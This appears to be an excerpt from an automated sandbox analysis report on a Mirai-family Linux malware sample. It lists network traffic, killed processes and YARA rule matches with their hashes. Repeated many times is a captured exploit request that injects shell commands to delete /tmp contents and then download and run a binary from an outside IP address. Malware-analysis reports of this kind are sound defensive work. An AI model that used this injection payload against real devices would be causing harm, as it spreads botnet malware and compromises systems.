Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: unknown HTTPS traffic detected: 162.213.33.132:443 -> 192.168.2.23:35426 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.213.33.108:443 -> 192.168.2.23:36624 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.213.33.108:443 -> 192.168.2.23:36626 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.213.33.108:443 -> 192.168.2.23:36628 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.213.33.108:443 -> 192.168.2.23:36630 version: TLS 1.2

System Summary:

barindex
Malicious sample detected (through community Yara rule)
Source: 01oHMcUgUM, type: SAMPLE Matched rule: Detects Mirai Botnet Malware Author: Florian Roth
Source: 01oHMcUgUM, type: SAMPLE Matched rule: Detects ELF malware Mirai related Author: Florian Roth
Source: 5271.1.00000000cb929c31.00000000ca8c47d7.r-x.sdmp, type: MEMORY Matched rule: Detects Mirai Botnet Malware Author: Florian Roth
Source: 5271.1.00000000cb929c31.00000000ca8c47d7.r-x.sdmp, type: MEMORY Matched rule: Detects ELF malware Mirai related Author: Florian Roth
Source: 5268.1.00000000cb929c31.00000000ca8c47d7.r-x.sdmp, type: MEMORY Matched rule: Detects Mirai Botnet Malware Author: Florian Roth
Source: 5268.1.00000000cb929c31.00000000ca8c47d7.r-x.sdmp, type: MEMORY Matched rule: Detects ELF malware Mirai related Author: Florian Roth
Source: 5274.1.00000000cb929c31.00000000ca8c47d7.r-x.sdmp, type: MEMORY Matched rule: Detects Mirai Botnet Malware Author: Florian Roth
Source: 5274.1.00000000cb929c31.00000000ca8c47d7.r-x.sdmp, type: MEMORY Matched rule: Detects ELF malware Mirai related Author: Florian Roth
Source: 5272.1.00000000cb929c31.00000000ca8c47d7.r-x.sdmp, type: MEMORY Matched rule: Detects Mirai Botnet Malware Author: Florian Roth
Source: 5272.1.00000000cb929c31.00000000ca8c47d7.r-x.sdmp, type: MEMORY Matched rule: Detects ELF malware Mirai related Author: Florian Roth
Source: 5275.1.00000000cb929c31.00000000ca8c47d7.r-x.sdmp, type: MEMORY Matched rule: Detects Mirai Botnet Malware Author: Florian Roth
Source: 5275.1.00000000cb929c31.00000000ca8c47d7.r-x.sdmp, type: MEMORY Matched rule: Detects ELF malware Mirai related Author: Florian Roth
Source: 5263.1.00000000cb929c31.00000000ca8c47d7.r-x.sdmp, type: MEMORY Matched rule: Detects Mirai Botnet Malware Author: Florian Roth
Source: 5263.1.00000000cb929c31.00000000ca8c47d7.r-x.sdmp, type: MEMORY Matched rule: Detects ELF malware Mirai related Author: Florian Roth
Source: 5266.1.00000000cb929c31.00000000ca8c47d7.r-x.sdmp, type: MEMORY Matched rule: Detects Mirai Botnet Malware Author: Florian Roth
Source: 5266.1.00000000cb929c31.00000000ca8c47d7.r-x.sdmp, type: MEMORY Matched rule: Detects ELF malware Mirai related Author: Florian Roth
Sample tries to kill multiple processes (SIGKILL)
Source: /tmp/01oHMcUgUM (PID: 5265) SIGKILL sent: pid: 936, result: successful Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) SIGKILL sent: pid: 5271, result: successful Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) SIGKILL sent: pid: 491, result: successful Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) SIGKILL sent: pid: 658, result: successful Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) SIGKILL sent: pid: 720, result: successful Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) SIGKILL sent: pid: 721, result: successful Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) SIGKILL sent: pid: 759, result: successful Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) SIGKILL sent: pid: 761, result: successful Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) SIGKILL sent: pid: 772, result: successful Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) SIGKILL sent: pid: 774, result: successful Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) SIGKILL sent: pid: 777, result: successful Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) SIGKILL sent: pid: 785, result: successful Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) SIGKILL sent: pid: 793, result: successful Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) SIGKILL sent: pid: 1334, result: successful Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) SIGKILL sent: pid: 1335, result: successful Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) SIGKILL sent: pid: 1344, result: successful Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) SIGKILL sent: pid: 1872, result: successful Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) SIGKILL sent: pid: 1886, result: successful Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) SIGKILL sent: pid: 2048, result: successful Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) SIGKILL sent: pid: 5039, result: successful Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) SIGKILL sent: pid: 5177, result: successful Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) SIGKILL sent: pid: 5178, result: successful Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) SIGKILL sent: pid: 5268, result: successful Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) SIGKILL sent: pid: 5274, result: successful Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) SIGKILL sent: pid: 5275, result: successful Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) SIGKILL sent: pid: 5305, result: successful Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) SIGKILL sent: pid: 5360, result: successful Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) SIGKILL sent: pid: 5372, result: successful Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) SIGKILL sent: pid: 5448, result: successful Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) SIGKILL sent: pid: 5449, result: successful Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) SIGKILL sent: pid: 5568, result: successful Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) SIGKILL sent: pid: 5569, result: successful Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) SIGKILL sent: pid: 5575, result: successful Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) SIGKILL sent: pid: 5635, result: successful Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) SIGKILL sent: pid: 5655, result: successful Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) SIGKILL sent: pid: 5658, result: successful Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) SIGKILL sent: pid: 5672, result: successful Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) SIGKILL sent: pid: 5679, result: successful Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) SIGKILL sent: pid: 5681, result: successful Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) SIGKILL sent: pid: 5683, result: successful Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) SIGKILL sent: pid: 5688, result: successful Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) SIGKILL sent: pid: 5747, result: successful Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) SIGKILL sent: pid: 5760, result: successful Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) SIGKILL sent: pid: 5766, result: successful Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) SIGKILL sent: pid: 5768, result: successful Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) SIGKILL sent: pid: 5775, result: successful Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) SIGKILL sent: pid: 5789, result: successful Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) SIGKILL sent: pid: 5795, result: successful Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) SIGKILL sent: pid: 5798, result: successful Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) SIGKILL sent: pid: 5857, result: successful Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) SIGKILL sent: pid: 5873, result: successful Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) SIGKILL sent: pid: 5881, result: successful Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) SIGKILL sent: pid: 5889, result: successful Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5265) SIGKILL sent: pid: 5898, result: successful Jump to behavior
Source: /tmp/01oHMcUgUM (PID: 5271) SIGKILL sent: pid: 936, result: successful Jump to behavior
Yara signature match
Source: 01oHMcUgUM, type: SAMPLE Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 01oHMcUgUM, type: SAMPLE Matched rule: Mirai_Botnet_Malware date = 2016-10-04, hash5 = 420bf9215dfb04e5008c5e522eee9946599e2b323b17f17919cd802ebb012175, hash4 = 2efa09c124f277be2199bee58f49fc0ce6c64c0bef30079dfb3d94a6de492a69, hash3 = 20683ff7a5fec1237fc09224af40be029b9548c62c693844624089af568c89d4, hash2 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, hash1 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, author = Florian Roth, description = Detects Mirai Botnet Malware, hash10 = c61bf95146c68bfbbe01d7695337ed0e93ea759f59f651799f07eecdb339f83f, hash11 = d9573c3850e2ae35f371dff977fc3e5282a5e67db8e3274fd7818e8273fd5c89, hash12 = f1100c84abff05e0501e77781160d9815628e7fd2de9e53f5454dbcac7c84ca5, hash9 = bf0471b37dba7939524a30d7d5afc8fcfb8d4a7c9954343196737e72ea4e2dc4, hash8 = 89570ae59462e6472b6769545a999bde8457e47ae0d385caaa3499ab735b8147, hash7 = 70bb0ec35dd9afcfd52ec4e1d920e7045dc51dca0573cd4c753987c9d79405c0, hash6 = 62cdc8b7fffbaf5683a466f6503c03e68a15413a90f6afd5a13ba027631460c6, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash13 = fb713ccf839362bf0fbe01aedd6796f4d74521b133011b408e42c1fd9ab8246b
Source: 01oHMcUgUM, type: SAMPLE Matched rule: MAL_ELF_LNX_Mirai_Oct10_2 date = 2018-10-27, hash1 = fa0018e75f503f9748a5de0d14d4358db234f65e28c31c8d5878cc58807081c9, author = Florian Roth, description = Detects ELF malware Mirai related, reference = Internal Research
Source: 5272.1.00000000271eff95.00000000354abf44.rw-.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 5274.1.00000000271eff95.00000000354abf44.rw-.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 5271.1.00000000cb929c31.00000000ca8c47d7.r-x.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 5271.1.00000000cb929c31.00000000ca8c47d7.r-x.sdmp, type: MEMORY Matched rule: Mirai_Botnet_Malware date = 2016-10-04, hash5 = 420bf9215dfb04e5008c5e522eee9946599e2b323b17f17919cd802ebb012175, hash4 = 2efa09c124f277be2199bee58f49fc0ce6c64c0bef30079dfb3d94a6de492a69, hash3 = 20683ff7a5fec1237fc09224af40be029b9548c62c693844624089af568c89d4, hash2 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, hash1 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, author = Florian Roth, description = Detects Mirai Botnet Malware, hash10 = c61bf95146c68bfbbe01d7695337ed0e93ea759f59f651799f07eecdb339f83f, hash11 = d9573c3850e2ae35f371dff977fc3e5282a5e67db8e3274fd7818e8273fd5c89, hash12 = f1100c84abff05e0501e77781160d9815628e7fd2de9e53f5454dbcac7c84ca5, hash9 = bf0471b37dba7939524a30d7d5afc8fcfb8d4a7c9954343196737e72ea4e2dc4, hash8 = 89570ae59462e6472b6769545a999bde8457e47ae0d385caaa3499ab735b8147, hash7 = 70bb0ec35dd9afcfd52ec4e1d920e7045dc51dca0573cd4c753987c9d79405c0, hash6 = 62cdc8b7fffbaf5683a466f6503c03e68a15413a90f6afd5a13ba027631460c6, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash13 = fb713ccf839362bf0fbe01aedd6796f4d74521b133011b408e42c1fd9ab8246b
Source: 5271.1.00000000cb929c31.00000000ca8c47d7.r-x.sdmp, type: MEMORY Matched rule: MAL_ELF_LNX_Mirai_Oct10_2 date = 2018-10-27, hash1 = fa0018e75f503f9748a5de0d14d4358db234f65e28c31c8d5878cc58807081c9, author = Florian Roth, description = Detects ELF malware Mirai related, reference = Internal Research
Source: 5268.1.00000000cb929c31.00000000ca8c47d7.r-x.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 5268.1.00000000cb929c31.00000000ca8c47d7.r-x.sdmp, type: MEMORY Matched rule: Mirai_Botnet_Malware date = 2016-10-04, hash5 = 420bf9215dfb04e5008c5e522eee9946599e2b323b17f17919cd802ebb012175, hash4 = 2efa09c124f277be2199bee58f49fc0ce6c64c0bef30079dfb3d94a6de492a69, hash3 = 20683ff7a5fec1237fc09224af40be029b9548c62c693844624089af568c89d4, hash2 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, hash1 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, author = Florian Roth, description = Detects Mirai Botnet Malware, hash10 = c61bf95146c68bfbbe01d7695337ed0e93ea759f59f651799f07eecdb339f83f, hash11 = d9573c3850e2ae35f371dff977fc3e5282a5e67db8e3274fd7818e8273fd5c89, hash12 = f1100c84abff05e0501e77781160d9815628e7fd2de9e53f5454dbcac7c84ca5, hash9 = bf0471b37dba7939524a30d7d5afc8fcfb8d4a7c9954343196737e72ea4e2dc4, hash8 = 89570ae59462e6472b6769545a999bde8457e47ae0d385caaa3499ab735b8147, hash7 = 70bb0ec35dd9afcfd52ec4e1d920e7045dc51dca0573cd4c753987c9d79405c0, hash6 = 62cdc8b7fffbaf5683a466f6503c03e68a15413a90f6afd5a13ba027631460c6, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash13 = fb713ccf839362bf0fbe01aedd6796f4d74521b133011b408e42c1fd9ab8246b
Source: 5268.1.00000000cb929c31.00000000ca8c47d7.r-x.sdmp, type: MEMORY Matched rule: MAL_ELF_LNX_Mirai_Oct10_2 date = 2018-10-27, hash1 = fa0018e75f503f9748a5de0d14d4358db234f65e28c31c8d5878cc58807081c9, author = Florian Roth, description = Detects ELF malware Mirai related, reference = Internal Research
Source: 5268.1.00000000271eff95.00000000354abf44.rw-.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 5274.1.00000000cb929c31.00000000ca8c47d7.r-x.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 5274.1.00000000cb929c31.00000000ca8c47d7.r-x.sdmp, type: MEMORY Matched rule: Mirai_Botnet_Malware date = 2016-10-04, hash5 = 420bf9215dfb04e5008c5e522eee9946599e2b323b17f17919cd802ebb012175, hash4 = 2efa09c124f277be2199bee58f49fc0ce6c64c0bef30079dfb3d94a6de492a69, hash3 = 20683ff7a5fec1237fc09224af40be029b9548c62c693844624089af568c89d4, hash2 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, hash1 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, author = Florian Roth, description = Detects Mirai Botnet Malware, hash10 = c61bf95146c68bfbbe01d7695337ed0e93ea759f59f651799f07eecdb339f83f, hash11 = d9573c3850e2ae35f371dff977fc3e5282a5e67db8e3274fd7818e8273fd5c89, hash12 = f1100c84abff05e0501e77781160d9815628e7fd2de9e53f5454dbcac7c84ca5, hash9 = bf0471b37dba7939524a30d7d5afc8fcfb8d4a7c9954343196737e72ea4e2dc4, hash8 = 89570ae59462e6472b6769545a999bde8457e47ae0d385caaa3499ab735b8147, hash7 = 70bb0ec35dd9afcfd52ec4e1d920e7045dc51dca0573cd4c753987c9d79405c0, hash6 = 62cdc8b7fffbaf5683a466f6503c03e68a15413a90f6afd5a13ba027631460c6, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash13 = fb713ccf839362bf0fbe01aedd6796f4d74521b133011b408e42c1fd9ab8246b
